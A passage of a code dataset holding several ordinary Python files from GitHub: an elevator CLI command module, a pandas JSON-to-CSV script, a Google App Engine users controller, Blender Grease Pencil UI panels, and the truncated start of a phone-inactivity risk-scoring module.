+{"seq_id": "9288296896", "text": "from __future__ import print_function\n\nimport sys\n\nfrom ..tools import cli\n\n\n# Define version specific functions\nif sys.version_info[:2] <= (2, 7): # If Python 2.7\n user_input = raw_input\nelse:\n user_input = input\n\n\n# Commands for the interface\n\ndef _show_description():\n \"\"\"Command to show description of a node.\"\"\"\n\n current_node = cli.Node.get_current_node()\n if current_node.description is None:\n print(\"No description is available for this node.\")\n else:\n print(current_node.description)\n\n\ndef _show_commands():\n \"\"\"Command to show the commands and their descriptions for the layer\"\"\"\n\n cmds_to_display = cli.Command.get_commands()\n for name, command in cmds_to_display.items():\n print(\"- {}:\\n\".format(name))\n print(\"\\t{}\\n\".format(command.cmd.__doc__))\n\n\ndef _navigate_down_node_tree():\n \"\"\"Command to go down a level in the interface\"\"\"\n\n entries = cli.Node.get_entries()\n current_node = cli.Node.get_current_node()\n node_count = len(current_node.children)\n if node_count != 0:\n if node_count == 1:\n entries.append(list(current_node.children)[0]) # Go to the only option available\n else:\n _give_node_options(current_node.children, entries)\n else:\n print(\"There are currently no options to choose from.\")\n\n\ndef _give_node_options(child_nodes, entries):\n\n while True:\n print(\"You have the following options to choose from: \", ', '.join(child_nodes), '\\n')\n option = user_input(\"Choose one of the options or you can go back by typing 'back': \")\n if option in child_nodes:\n entries.append(option)\n break\n elif option == \"back\":\n break\n else:\n print(\"The entry '\" + option + \"' is not in the current options.\\n\")\n\n\ndef _navigate_up_node_tree():\n \"\"\"Command to go up a level in the interface or return to the previous entry\"\"\"\n\n cli.Node.get_entries().pop()\n\n\ndef _run_node_callback():\n \"\"\"Command to execute a callback function\"\"\"\n\n current_node = cli.Node.get_current_node()\n if hasattr(current_node, \"callback\"):\n current_node.callback()\n", "repo_name": "YousefSalaman/Elevator-System", "sub_path": "src/Python/config/commands.py", "file_name": "commands.py", "file_ext": "py", "file_size_in_byte": 2165, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "sys.version_info", "line_number": 9, "usage_type": "attribute"}, {"api_name": "tools.cli.Node.get_current_node", "line_number": 20, "usage_type": "call"}, {"api_name": "tools.cli.Node", "line_number": 20, "usage_type": "attribute"}, {"api_name": "tools.cli", "line_number": 20, "usage_type": "name"}, {"api_name": "tools.cli.Command.get_commands", "line_number": 30, "usage_type": "call"}, {"api_name": "tools.cli.Command", "line_number": 30, "usage_type": "attribute"}, {"api_name": "tools.cli", "line_number": 30, "usage_type": "name"}, {"api_name": "tools.cli.Node.get_entries", "line_number": 39, "usage_type": "call"}, {"api_name": "tools.cli.Node", "line_number": 39, "usage_type": "attribute"}, {"api_name": "tools.cli", "line_number": 39, "usage_type": "name"}, {"api_name": "tools.cli.Node.get_current_node", "line_number": 40, "usage_type": "call"}, {"api_name": "tools.cli.Node", "line_number": 40, "usage_type": "attribute"}, {"api_name": "tools.cli", "line_number": 40, "usage_type": "name"}, {"api_name": "tools.cli.Node.get_entries", "line_number": 68, "usage_type": "call"}, {"api_name": "tools.cli.Node", "line_number": 68, "usage_type": "attribute"}, {"api_name": "tools.cli", "line_number": 68, "usage_type": "name"}, {"api_name": "tools.cli.Node.get_current_node", "line_number": 74, "usage_type": "call"}, {"api_name": "tools.cli.Node", "line_number": 74, "usage_type": "attribute"}, {"api_name": "tools.cli", "line_number": 74, "usage_type": "name"}]}
+{"seq_id": "43534783845", "text": "\nimport pandas as pd\nimport json\nimport dask.dataframe as dd\nimport numpy as np\nimport zipfile\nimport glob\nimport numba\nimport os\n\nimport elementpath\nfrom xml.etree import ElementTree\nimport numpy as np\npd.options.display.max_columns = 999\n\ntarget_id = '2'\nfile_prefix = 'bsrobo4-risp-picking-'\ninput_path = 'C:/Users/magagnolif/Desktop/Materiale MPS/Materiale Progetti/RB4/PYTHON/input/'\nouput_path = 'C:/Users/magagnolif/Desktop/Materiale MPS/Materiale Progetti/RB4/PYTHON/output/'\n\n#get_ipython().run_cell_magic('time', '', \"df = pd.DataFrame()\\n\\nwith open(f'{input_path}{file_prefix}{target_id}'+'.json') as file:\\n json_data = json.load(file)\\n df_tmp = pd.DataFrame.from_records(pd.DataFrame(json_data['hits']['hits'])['_source'].values)\\n print(df_tmp)\\n df = pd.concat([df,df_tmp])\\ndf = df.reset_index(drop = True)\")\n\ndf = pd.DataFrame()\n\nwith open(f'{input_path}{file_prefix}{target_id}'+'.json') as file:\n json_data = json.load(file)\n df_tmp = pd.DataFrame.from_records(pd.DataFrame(json_data['hits']['hits'])['_source'].values)\n print(df_tmp)\n df = pd.concat([df,df_tmp])\ndf = df.reset_index(drop = True)\n\ndef extract_elements(group):\n def get_attr(el,key):\n return None if el.find(key) is None else el.find(key).text\n \n delta_plus = pd.DataFrame()\n filiale = group['filiale'].values[0]\n codiceGestore = group['codiceGestore'].values[0]\n outcome = group['outcome'].values[0]\n codiceCliente = group['codiceCliente'].values[0]\n delta_plus = pd.concat([delta_plus, pd.DataFrame([[\n filiale,\n codiceGestore,\n outcome,\n codiceCliente\n ]],\n columns = [\n 'filiale',\n 'codiceGestore',\n 'outcome',\n 'codiceCliente'\n ])])\n return delta_plus\n\noutput = df.groupby('codiceCliente').apply(extract_elements).reset_index(drop = True)\n#output = df.apply(extract_elements).reset_index(drop = True)\noutput.to_csv(f'{ouput_path}bsrobo4-risp-picking-{target_id}.csv',sep= ';', index = False)\n\ninput_files = os.listdir(f'{input_path}')\nprint(input_files)\nfor inputf in input_files:\n if(inputf.find('bsrobo4-risp-picking-') == -1):\n continue\n target_id = inputf.replace('bsrobo4-risp-picking-','').replace('.zip','');\n print('processing target_id'+target_id)\n\n\n\n", "repo_name": "AndreaBollino/MyPrograms", "sub_path": "robo4/monitoraggio-campagne.py", "file_name": "monitoraggio-campagne.py", "file_ext": "py", "file_size_in_byte": 2643, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "pandas.options", "line_number": 14, "usage_type": "attribute"}, {"api_name": "pandas.DataFrame", "line_number": 23, "usage_type": "call"}, {"api_name": "json.load", "line_number": 26, "usage_type": "call"}, {"api_name": "pandas.DataFrame.from_records", "line_number": 27, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 27, "usage_type": "attribute"}, {"api_name": "pandas.concat", "line_number": 29, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 36, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 41, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 41, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 59, "usage_type": "call"}]}
+{"seq_id": "35342644394", "text": "'''\nCreated on 2009/08/01\n\n@author: takuji.shimokawa\n'''\n\nimport cgi\nfrom google.appengine.ext import webapp\nfrom google.appengine.ext.webapp import template\nimport base_controller\nimport os\nfrom ..models.user import User\nfrom ..models.twitter_account import TwitterAccount\nimport logging\n\nclass UsersController(base_controller.BaseController):\n\n def index(self):\n user = User.get_current_user()\n if user == None:\n raise base_controller.LoginRequiredException(self.request.url)\n if self.request.get(\"oauth_token\", None):\n twitter_account = TwitterAccount(oauth_token=self.request.get(\"oauth_token\"))\n twitter_account.put()\n user.twitter_account = twitter_account\n user.put()\n self.redirect(user.path())\n\n def new(self):\n # ASSERT LOGGED IN\n self.response.headers['Content-Type'] = 'text/plain'\n self.response.out.write(\"UsersController NEW\")\n\n def show(self, user_id):\n user = User.get_current_user()\n if user == None:\n raise base_controller.LoginRequiredException(self.request.url)\n editable = False\n if user.key().id() == long(user_id):\n editable = True\n template_values = {\n 'user': user,\n 'editable': editable\n }\n path = os.path.join(self.VIEWS_PATH, \"users/show.%s\" % self.response_format)\n self.response.out.write(template.render(path, template_values))\n\n def edit(self, user_id):\n # ASSERT LOGGED IN\n self.response.headers['Content-Type'] = 'text/plain'\n self.response.out.write(\"UsersController EDIT: %s\" % user_id)\n\n def delete(self, user_id):\n # ASSERT LOGGED IN\n # ASSERT User is the owner of this message\n self.response.headers['Content-Type'] = 'text/plain'\n self.response.out.write(\"UsersController DELETE: %s\" % user_id)\n\n def update(self, user_id):\n logging.info(\"ENTER: users_controller.update\")\n user = User.get_current_user()\n if user == None:\n raise base_controller.LoginRequiredException(self.request.url)\n if user.key().id() != long(user_id):\n raise base_controller.Redirect(self.request.url)\n lat = self.request.get(\"lat\", None)\n lon = self.request.get(\"lon\", None)\n if lat != None and lon != None:\n # Update user location\n user.update_location(lat, lon)\n logging.info(\"User's location is updated!\")\n \n", "repo_name": "gdgkyoto/kyoto-gtug", "sub_path": "GoogleAppEngine20090808/python-group/geo_tweet/src/gt/controllers/users_controller.py", "file_name": "users_controller.py", "file_ext": "py", "file_size_in_byte": 2291, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "base_controller.BaseController", "line_number": 16, "usage_type": "attribute"}, {"api_name": "models.user.User.get_current_user", "line_number": 19, "usage_type": "call"}, {"api_name": "models.user.User", "line_number": 19, "usage_type": "name"}, {"api_name": "base_controller.LoginRequiredException", "line_number": 21, "usage_type": "call"}, {"api_name": "models.twitter_account.TwitterAccount", "line_number": 23, "usage_type": "call"}, {"api_name": "models.user.User.get_current_user", "line_number": 35, "usage_type": "call"}, {"api_name": "models.user.User", "line_number": 35, "usage_type": "name"}, {"api_name": "base_controller.LoginRequiredException", "line_number": 37, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 45, "usage_type": "call"}, {"api_name": "os.path", "line_number": 45, "usage_type": "attribute"}, {"api_name": "google.appengine.ext.webapp.template.render", "line_number": 46, "usage_type": "call"}, {"api_name": "google.appengine.ext.webapp.template", "line_number": 46, "usage_type": "name"}, {"api_name": "logging.info", "line_number": 60, "usage_type": "call"}, {"api_name": "models.user.User.get_current_user", "line_number": 61, "usage_type": "call"}, {"api_name": "models.user.User", "line_number": 61, "usage_type": "name"}, {"api_name": "base_controller.LoginRequiredException", "line_number": 63, "usage_type": "call"}, {"api_name": "base_controller.Redirect", "line_number": 65, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 71, "usage_type": "call"}]}
+{"seq_id": "32623987827", "text": "# ##### BEGIN GPL LICENSE BLOCK #####\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software Foundation,\n# Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.\n#\n# ##### END GPL LICENSE BLOCK #####\n\n# \n\n\nfrom bpy.types import Menu, UIList\n\n\ndef gpencil_stroke_placement_settings(context, layout, gpd):\n col = layout.column(align=True)\n\n col.label(text=\"Stroke Placement:\")\n\n row = col.row(align=True)\n row.prop_enum(gpd, \"draw_mode\", 'VIEW')\n row.prop_enum(gpd, \"draw_mode\", 'CURSOR')\n\n if context.space_data.type == 'VIEW_3D':\n row = col.row(align=True)\n row.prop_enum(gpd, \"draw_mode\", 'SURFACE')\n row.prop_enum(gpd, \"draw_mode\", 'STROKE')\n\n row = col.row(align=False)\n row.active = gpd.draw_mode in {'SURFACE', 'STROKE'}\n row.prop(gpd, \"use_stroke_endpoints\")\n\n\nclass GreasePencilDrawingToolsPanel:\n # subclass must set\n # bl_space_type = 'IMAGE_EDITOR'\n bl_label = \"Grease Pencil\"\n bl_category = \"Grease Pencil\"\n bl_region_type = 'TOOLS'\n\n @staticmethod\n def draw(self, context):\n layout = self.layout\n\n col = layout.column(align=True)\n\n col.label(text=\"Draw:\")\n row = col.row(align=True)\n row.operator(\"gpencil.draw\", text=\"Draw\").mode = 'DRAW'\n row.operator(\"gpencil.draw\", text=\"Erase\").mode = 'ERASER'\n\n row = col.row(align=True)\n row.operator(\"gpencil.draw\", text=\"Line\").mode = 'DRAW_STRAIGHT'\n row.operator(\"gpencil.draw\", text=\"Poly\").mode = 'DRAW_POLY'\n\n row = col.row(align=True)\n row.prop(context.tool_settings, \"use_grease_pencil_sessions\", text=\"Continuous Drawing\")\n\n if context.space_data.type in {'VIEW_3D', 'CLIP_EDITOR'}:\n col.separator()\n col.label(\"Data Source:\")\n row = col.row(align=True)\n if context.space_data.type == 'VIEW_3D':\n row.prop(context.tool_settings, \"grease_pencil_source\", expand=True)\n elif context.space_data.type == 'CLIP_EDITOR':\n row.prop(context.space_data, \"grease_pencil_source\", expand=True)\n\n gpd = context.gpencil_data\n if gpd:\n col.separator()\n gpencil_stroke_placement_settings(context, col, gpd)\n\n if context.space_data.type == 'VIEW_3D':\n col.separator()\n col.separator()\n\n col.label(text=\"Tools:\")\n col.operator(\"gpencil.convert\", text=\"Convert...\")\n col.operator(\"view3d.ruler\")\n\n\nclass GreasePencilStrokeEditPanel:\n # subclass must set\n # bl_space_type = 'IMAGE_EDITOR'\n bl_label = \"Edit Strokes\"\n bl_category = \"Grease Pencil\"\n bl_region_type = 'TOOLS'\n\n @classmethod\n def poll(cls, context):\n return (context.gpencil_data is not None)\n\n @staticmethod\n def draw(self, context):\n layout = self.layout\n\n gpd = context.gpencil_data\n edit_ok = bool(context.editable_gpencil_strokes) and bool(gpd.use_stroke_edit_mode)\n\n col = layout.column(align=True)\n col.prop(gpd, \"use_stroke_edit_mode\", text=\"Enable Editing\", icon='EDIT', toggle=True)\n\n col.separator()\n\n col.label(text=\"Select:\")\n subcol = col.column(align=True)\n subcol.active = edit_ok\n subcol.operator(\"gpencil.select_all\", text=\"Select All\")\n subcol.operator(\"gpencil.select_border\")\n subcol.operator(\"gpencil.select_circle\")\n\n col.separator()\n\n subcol = col.column(align=True)\n subcol.active = edit_ok\n subcol.operator(\"gpencil.select_linked\")\n subcol.operator(\"gpencil.select_more\")\n subcol.operator(\"gpencil.select_less\")\n\n col.separator()\n\n col.label(text=\"Edit:\")\n row = col.row(align=True)\n row.active = edit_ok\n row.operator(\"gpencil.copy\", text=\"Copy\")\n row.operator(\"gpencil.paste\", text=\"Paste\")\n\n subcol = col.column(align=True)\n subcol.active = edit_ok\n subcol.operator(\"gpencil.delete\", text=\"Delete\")\n subcol.operator(\"gpencil.duplicate_move\", text=\"Duplicate\")\n subcol.operator(\"transform.mirror\", text=\"Mirror\").gpencil_strokes = True\n\n col.separator()\n\n subcol = col.column(align=True)\n subcol.active = edit_ok\n subcol.operator(\"transform.translate\").gpencil_strokes = True # icon='MAN_TRANS'\n subcol.operator(\"transform.rotate\").gpencil_strokes = True # icon='MAN_ROT'\n subcol.operator(\"transform.resize\", text=\"Scale\").gpencil_strokes = True # icon='MAN_SCALE'\n\n col.separator()\n\n subcol = col.column(align=True)\n subcol.active = edit_ok\n subcol.operator(\"transform.bend\", text=\"Bend\").gpencil_strokes = True\n subcol.operator(\"transform.shear\", text=\"Shear\").gpencil_strokes = True\n subcol.operator(\"transform.tosphere\", text=\"To Sphere\").gpencil_strokes = True\n\n\n###############################\n\nclass GPENCIL_PIE_tool_palette(Menu):\n \"\"\"A pie menu for quick access to Grease Pencil tools\"\"\"\n bl_label = \"Grease Pencil Tools\"\n\n def draw(self, context):\n layout = self.layout\n\n pie = layout.menu_pie()\n gpd = context.gpencil_data\n\n # W - Drawing Types\n col = pie.column()\n col.operator(\"gpencil.draw\", text=\"Draw\", icon='GREASEPENCIL').mode = 'DRAW'\n col.operator(\"gpencil.draw\", text=\"Straight Lines\", icon='LINE_DATA').mode = 'DRAW_STRAIGHT'\n col.operator(\"gpencil.draw\", text=\"Poly\", icon='MESH_DATA').mode = 'DRAW_POLY'\n\n # E - Eraser\n # XXX: needs a dedicated icon...\n col = pie.column()\n col.operator(\"gpencil.draw\", text=\"Eraser\", icon='FORCE_CURVE').mode = 'ERASER'\n\n # E - \"Settings\" Palette is included here too, since it needs to be in a stable position...\n if gpd and gpd.layers.active:\n col.separator()\n col.operator(\"wm.call_menu_pie\", text=\"Settings...\", icon='SCRIPTWIN').name = \"GPENCIL_PIE_settings_palette\"\n\n # Editing tools\n if gpd:\n if gpd.use_stroke_edit_mode and context.editable_gpencil_strokes:\n # S - Exit Edit Mode\n pie.prop(gpd, \"use_stroke_edit_mode\", text=\"Exit Edit Mode\", icon='EDIT')\n\n # N - Transforms\n col = pie.column()\n row = col.row(align=True)\n row.operator(\"transform.translate\", icon='MAN_TRANS').gpencil_strokes = True\n row.operator(\"transform.rotate\", icon='MAN_ROT').gpencil_strokes = True\n row.operator(\"transform.resize\", text=\"Scale\", icon='MAN_SCALE').gpencil_strokes = True\n row = col.row(align=True)\n row.label(\"Proportional Edit:\")\n row.prop(context.tool_settings, \"proportional_edit\", text=\"\", icon_only=True)\n row.prop(context.tool_settings, \"proportional_edit_falloff\", text=\"\", icon_only=True)\n\n # NW - Select (Non-Modal)\n col = pie.column()\n col.operator(\"gpencil.select_all\", text=\"Select All\", icon='PARTICLE_POINT')\n col.operator(\"gpencil.select_all\", text=\"Select Inverse\", icon='BLANK1')\n col.operator(\"gpencil.select_linked\", text=\"Select Linked\", icon='LINKED')\n\n # NE - Select (Modal)\n col = pie.column()\n col.operator(\"gpencil.select_border\", text=\"Border Select\", icon='BORDER_RECT')\n col.operator(\"gpencil.select_circle\", text=\"Circle Select\", icon='META_EMPTY')\n col.operator(\"gpencil.select_lasso\", text=\"Lasso Select\", icon='BORDER_LASSO')\n\n # SW - Edit Tools\n col = pie.column()\n col.operator(\"gpencil.duplicate_move\", icon='PARTICLE_PATH', text=\"Duplicate\")\n col.operator(\"gpencil.delete\", icon='X', text=\"Delete...\")\n\n # SE - More Tools\n pie.operator(\"wm.call_menu_pie\", text=\"More...\").name = \"GPENCIL_PIE_tools_more\"\n else:\n # Toggle Edit Mode\n pie.prop(gpd, \"use_stroke_edit_mode\", text=\"Enable Stroke Editing\", icon='EDIT')\n\n\nclass GPENCIL_PIE_settings_palette(Menu):\n \"\"\"A pie menu for quick access to Grease Pencil settings\"\"\"\n bl_label = \"Grease Pencil Settings\"\n\n @classmethod\n def poll(cls, context):\n return bool(context.gpencil_data and context.active_gpencil_layer)\n\n def draw(self, context):\n layout = self.layout\n\n pie = layout.menu_pie()\n # gpd = context.gpencil_data\n gpl = context.active_gpencil_layer\n\n # W - Stroke draw settings\n col = pie.column(align=True)\n col.label(text=\"Stroke\")\n col.prop(gpl, \"color\", text=\"\")\n col.prop(gpl, \"alpha\", text=\"\", slider=True)\n\n # E - Fill draw settings\n col = pie.column(align=True)\n col.label(text=\"Fill\")\n col.prop(gpl, \"fill_color\", text=\"\")\n col.prop(gpl, \"fill_alpha\", text=\"\", slider=True)\n\n # S - Layer settings\n col = pie.column()\n col.prop(gpl, \"line_width\", slider=True)\n # col.prop(gpl, \"use_volumetric_strokes\")\n col.prop(gpl, \"use_onion_skinning\")\n\n # N - Active Layer\n # XXX: this should show an operator to change the active layer instead\n col = pie.column()\n col.label(\"Active Layer: \")\n col.prop(gpl, \"info\", text=\"\")\n # col.prop(gpd, \"layers\")\n row = col.row()\n row.prop(gpl, \"lock\")\n row.prop(gpl, \"hide\")\n\n\nclass GPENCIL_PIE_tools_more(Menu):\n \"\"\"A pie menu for accessing more Grease Pencil tools\"\"\"\n bl_label = \"More Grease Pencil Tools\"\n\n @classmethod\n def poll(cls, context):\n gpd = context.gpencil_data\n return bool(gpd and gpd.use_stroke_edit_mode and context.editable_gpencil_strokes)\n\n def draw(self, context):\n layout = self.layout\n\n pie = layout.menu_pie()\n # gpd = context.gpencil_data\n\n col = pie.column(align=True)\n col.operator(\"gpencil.copy\", icon='COPYDOWN', text=\"Copy\")\n col.operator(\"gpencil.paste\", icon='PASTEDOWN', text=\"Paste\")\n\n col = pie.column(align=True)\n col.operator(\"gpencil.select_more\", icon='ZOOMIN')\n col.operator(\"gpencil.select_less\", icon='ZOOMOUT')\n\n pie.operator(\"transform.mirror\", icon='MOD_MIRROR').gpencil_strokes = True\n pie.operator(\"transform.bend\", icon='MOD_SIMPLEDEFORM').gpencil_strokes = True\n pie.operator(\"transform.shear\", icon='MOD_TRIANGULATE').gpencil_strokes = True\n pie.operator(\"transform.tosphere\", icon='MOD_MULTIRES').gpencil_strokes = True\n\n pie.operator(\"gpencil.convert\", icon='OUTLINER_OB_CURVE', text=\"Convert...\")\n pie.operator(\"wm.call_menu_pie\", text=\"Back to Main Palette...\").name = \"GPENCIL_PIE_tool_palette\"\n\n\n###############################\n\nclass GPENCIL_UL_layer(UIList):\n def draw_item(self, context, layout, data, item, icon, active_data, active_propname, index):\n # assert(isinstance(item, bpy.types.GPencilLayer)\n gpl = item\n\n if self.layout_type in {'DEFAULT', 'COMPACT'}:\n if gpl.lock:\n layout.active = False\n\n split = layout.split(percentage=0.25)\n row = split.row(align=True)\n row.prop(gpl, \"color\", text=\"\", emboss=gpl.is_stroke_visible)\n row.prop(gpl, \"fill_color\", text=\"\", emboss=gpl.is_fill_visible)\n split.prop(gpl, \"info\", text=\"\", emboss=False)\n\n row = layout.row(align=True)\n row.prop(gpl, \"lock\", text=\"\", emboss=False)\n row.prop(gpl, \"hide\", text=\"\", emboss=False)\n elif self.layout_type == 'GRID':\n layout.alignment = 'CENTER'\n layout.label(text=\"\", icon_value=icon)\n\n\nclass GreasePencilDataPanel:\n # subclass must set\n # bl_space_type = 'IMAGE_EDITOR'\n bl_label = \"Grease Pencil\"\n bl_region_type = 'UI'\n\n @staticmethod\n def draw_header(self, context):\n self.layout.prop(context.space_data, \"show_grease_pencil\", text=\"\")\n\n @staticmethod\n def draw(self, context):\n layout = self.layout\n\n # owner of Grease Pencil data\n gpd_owner = context.gpencil_data_owner\n gpd = context.gpencil_data\n\n # Owner Selector\n if context.space_data.type == 'VIEW_3D':\n layout.prop(context.tool_settings, \"grease_pencil_source\", expand=True)\n elif context.space_data.type == 'CLIP_EDITOR':\n layout.prop(context.space_data, \"grease_pencil_source\", expand=True)\n\n # Grease Pencil data selector\n layout.template_ID(gpd_owner, \"grease_pencil\", new=\"gpencil.data_add\", unlink=\"gpencil.data_unlink\")\n\n # Grease Pencil data...\n if (gpd is None) or (not gpd.layers):\n layout.operator(\"gpencil.layer_add\", text=\"New Layer\")\n else:\n self.draw_layers(context, layout, gpd)\n\n def draw_layers(self, context, layout, gpd):\n row = layout.row()\n\n col = row.column()\n if len(gpd.layers) >= 2:\n layer_rows = 5\n else:\n layer_rows = 2\n col.template_list(\"GPENCIL_UL_layer\", \"\", gpd, \"layers\", gpd.layers, \"active_index\", rows=layer_rows)\n\n col = row.column()\n\n sub = col.column(align=True)\n sub.operator(\"gpencil.layer_add\", icon='ZOOMIN', text=\"\")\n sub.operator(\"gpencil.layer_remove\", icon='ZOOMOUT', text=\"\")\n\n gpl = context.active_gpencil_layer\n if gpl:\n sub.operator(\"gpencil.layer_duplicate\", icon='COPY_ID', text=\"\") # XXX: needs a dedicated icon\n\n if len(gpd.layers) > 1:\n col.separator()\n\n sub = col.column(align=True)\n sub.operator(\"gpencil.layer_move\", icon='TRIA_UP', text=\"\").type = 'UP'\n sub.operator(\"gpencil.layer_move\", icon='TRIA_DOWN', text=\"\").type = 'DOWN'\n\n if gpl:\n self.draw_layer(layout, gpl)\n\n def draw_layer(self, layout, gpl):\n # layer settings\n split = layout.split(percentage=0.5)\n split.active = not gpl.lock\n\n # Column 1 - Stroke\n col = split.column(align=True)\n col.label(text=\"Stroke:\")\n col.prop(gpl, \"color\", text=\"\")\n col.prop(gpl, \"alpha\", slider=True)\n\n # Column 2 - Fill\n col = split.column(align=True)\n col.label(text=\"Fill:\")\n col.prop(gpl, \"fill_color\", text=\"\")\n col.prop(gpl, \"fill_alpha\", text=\"Opacity\", slider=True)\n\n # Options\n split = layout.split(percentage=0.5)\n split.active = not gpl.lock\n\n col = split.column(align=True)\n col.prop(gpl, \"line_width\", slider=True)\n col.prop(gpl, \"use_volumetric_strokes\")\n\n col = split.column(align=True)\n col.prop(gpl, \"show_x_ray\")\n col.prop(gpl, \"show_points\", text=\"Points\")\n\n layout.separator()\n\n # Full-Row - Frame Locking (and Delete Frame)\n row = layout.row(align=True)\n row.active = not gpl.lock\n\n if gpl.active_frame:\n lock_status = \"Locked\" if gpl.lock_frame else \"Unlocked\"\n lock_label = \"Frame: %d (%s)\" % (gpl.active_frame.frame_number, lock_status)\n else:\n lock_label = \"Lock Frame\"\n row.prop(gpl, \"lock_frame\", text=lock_label, icon='UNLOCKED')\n row.operator(\"gpencil.active_frame_delete\", text=\"\", icon='X')\n\n layout.separator()\n\n # Onion skinning\n col = layout.column(align=True)\n col.active = not gpl.lock\n\n row = col.row()\n row.prop(gpl, \"use_onion_skinning\")\n row.prop(gpl, \"use_ghost_custom_colors\", text=\"\", icon='COLOR')\n\n split = col.split(percentage=0.5)\n split.active = gpl.use_onion_skinning\n\n # - Before Frames\n sub = split.column(align=True)\n row = sub.row(align=True)\n row.active = gpl.use_ghost_custom_colors\n row.prop(gpl, \"before_color\", text=\"\")\n sub.prop(gpl, \"ghost_before_range\", text=\"Before\")\n\n # - After Frames\n sub = split.column(align=True)\n row = sub.row(align=True)\n row.active = gpl.use_ghost_custom_colors\n row.prop(gpl, \"after_color\", text=\"\")\n sub.prop(gpl, \"ghost_after_range\", text=\"After\")\n\n\nclass GreasePencilToolsPanel:\n # subclass must set\n # bl_space_type = 'IMAGE_EDITOR'\n # bl_options = {'DEFAULT_CLOSED'}\n bl_label = \"Grease Pencil Settings\"\n bl_region_type = 'UI'\n\n @classmethod\n def poll(cls, context):\n return (context.gpencil_data is not None)\n\n @staticmethod\n def draw(self, context):\n layout = self.layout\n\n # gpd_owner = context.gpencil_data_owner\n gpd = context.gpencil_data\n\n layout.prop(gpd, \"use_stroke_edit_mode\", text=\"Enable Editing\", icon='EDIT', toggle=True)\n\n layout.separator()\n\n layout.label(\"Proportional Edit:\")\n row = layout.row()\n row.prop(context.tool_settings, \"proportional_edit\", text=\"\")\n row.prop(context.tool_settings, \"proportional_edit_falloff\", text=\"\")\n\n layout.separator()\n layout.separator()\n\n gpencil_stroke_placement_settings(context, layout, gpd)\n", "repo_name": "Squashwell/bepuik", "sub_path": "release/scripts/startup/bl_ui/properties_grease_pencil_common.py", "file_name": "properties_grease_pencil_common.py", "file_ext": "py", "file_size_in_byte": 17777, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 57, "dataset": "github-code", "pt": "53", "api": [{"api_name": "bpy.types.Menu", "line_number": 163, "usage_type": "name"}, {"api_name": "bpy.types.Menu", "line_number": 230, "usage_type": "name"}, {"api_name": "bpy.types.Menu", "line_number": 274, "usage_type": "name"}, {"api_name": "bpy.types.UIList", "line_number": 308, "usage_type": "name"}]}
+{"seq_id": "6202423053", "text": "# coding: utf-8\nimport datetime\nfrom collections import Counter\nfrom operator import itemgetter, attrgetter\nimport re\nimport time\nfrom functools import partial\nfrom ..constants import RiskEvaluation\nfrom app.core.functions import save_to_cache\n\n\ndef judge_day_serial():\n \"\"\" 判断两个时间是否连续 \"\"\"\n pass\n\n\ndef second_to_minute(t):\n t = int(t or 0)\n # if t % 60 == 0:\n # return t // 60\n # return t // 60 + 1\n return float('%.2f' % (t / 60))\n\ndef two_num(d):\n if d == 0:\n return float(d)\n return float('%.2f' % d)\n\ndef cao_time_time_to_str(d):\n\n if d == 0:\n return ''\n\n if not d:\n return d\n timeArray = time.localtime(d)\n otherStyleTime = time.strftime(\"%Y-%m-%d\", timeArray)\n return otherStyleTime\n\n\nclass UserExceptionAction:\n \"\"\"\n 用户异常行为分析\n \"\"\"\n __slots__ = ('data')\n\n def time_trans(self, t_s):\n return datetime.datetime.strptime(t_s, \"%Y%m%d\")\n\n def __init__(self, data):\n self.data = data\n\n def long_time_slicense(self, data_r, flag, now=None):\n \"\"\" 长时间静默 \"\"\"\n # data = self.data.get('silenceInfo', []).copy()\n data = data_r.copy()\n key = 'connDate'\n data = sorted(data, key=lambda x:int(x.get(key, 0)))\n if not data and flag is False:\n\n return {\n \"name\": \"手机长时间静默情况\",\n \"result\": '',\n \"accord\": '',\n \"assess\": 6,\n }\n if not data:\n return {\n \"name\": \"手机长时间静默情况\",\n \"result\": '0',\n \"accord\": '近6个月出现0次手机长时间静默情况,失联风险低',\n \"assess\": 1,\n }\n try:\n result = []\n if now is None:\n now = datetime.datetime.now().strftime('%Y%m%d')\n data.append({'connDate': now, 'connTimes': 1})\n last_t = self.time_trans(data[0].get(key))\n for index in range(1, len(data)):\n now_t = self.time_trans(data[index].get(key))\n if (now_t - last_t).days > 10:\n result.append({'days': (now_t - last_t).days, \"st\": last_t, \"end\": now_t})\n last_t = now_t\n result = sorted(result, key=itemgetter('days', \"st\"), reverse=False)\n\n def out_put(src):\n \"\"\" 整理成前端所需要的格式 \"\"\"\n out_put = []\n template = \"静默{0}天,时间{1}~{2}\"\n for value in src:\n out_put.append(template.format(\n value['days'], value['st'].strftime(\"%Y-%m-%d\"), value['end'].strftime(\"%Y-%m-%d\")\n ))\n # l = '近6个月出现3次手机长时间静默情况,失联风险{}'\n risk = {\n 0: '低',\n 1: '关注',\n 2: '高'\n }\n level = 0\n if len(src):\n if src[-1]['days'] <= 10:\n level = 0\n elif src[-1]['days'] <= 30:\n level = 1\n else:\n level = 2\n l = '近6个月出现{}次长时间手机静默情况,失联风险{}'.format(len(result), risk[level])\n\n for i in out_put:\n l = l + '' + i + ' '\n l = l + ' '\n if len(result) == 0:\n l = '近6个月无连续10天通话记录为空情况'\n return len(result), l, level\n\n max_result = result[-1]['days'] if result else 0\n assess, name, result = out_put(result)\n d = {\n 0: 1,\n 1: 2,\n 2: 4\n }\n return {\n \"name\": 